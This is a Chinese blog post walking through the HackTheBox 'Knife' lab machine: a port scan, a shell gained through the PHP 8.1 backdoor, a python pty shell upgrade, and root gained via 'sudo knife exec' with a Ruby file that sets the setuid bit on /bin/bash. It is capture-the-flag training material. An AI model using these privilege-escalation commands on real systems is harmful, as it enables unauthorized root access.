freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

hackthebox knife
2021-09-27 19:14:45

扫一下端口1632740641_6151a521dd859bd6bc3b9.png!small

然后发现有80端口,于是去访问1632740685_6151a54d0724f34e71e1b.png!small

用工具发现它是用php8.1写的,8.1有官方留的后门1632740800_6151a5c002226c234aa23.png!small

于是这样可以写一个shell,可以参考php8.1漏洞
记得拿nc监听端口1632740817_6151a5d1dedcfb4442327.png!small

说找找有没有python ,建立一个更好的shell
于是which python3
有python3,打出命令

python3 -c 'import pty; pty.spawn("/bin/bash")'

看起来像是写了个,小脚本,这里一句话反弹shell,有很多
参考常用一句话反弹shell
然后我们到根目录找到 第一个flag users.txt,一般它这个靶场一个flag在home,一个在root

1632740990_6151a67ebe949a6b21640.png!small

然后就该提权了

echo "system('chmod +s /bin/bash')" > exploit.rb
ls
sudo /usr/bin/knife exec exploit.rb
ls -al /bin/bash
/bin/bash –p

1632741063_6151a6c7d4d017ede06a7.png!small

然后进入root文件夹,获取root.txt

1632741085_6151a6dd05a4b944bfd57.png!small

提权参考可以看这个提权合集,我也是边写边学,有什么不对的地方希望大家指出,提问。

# HackTheBox
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者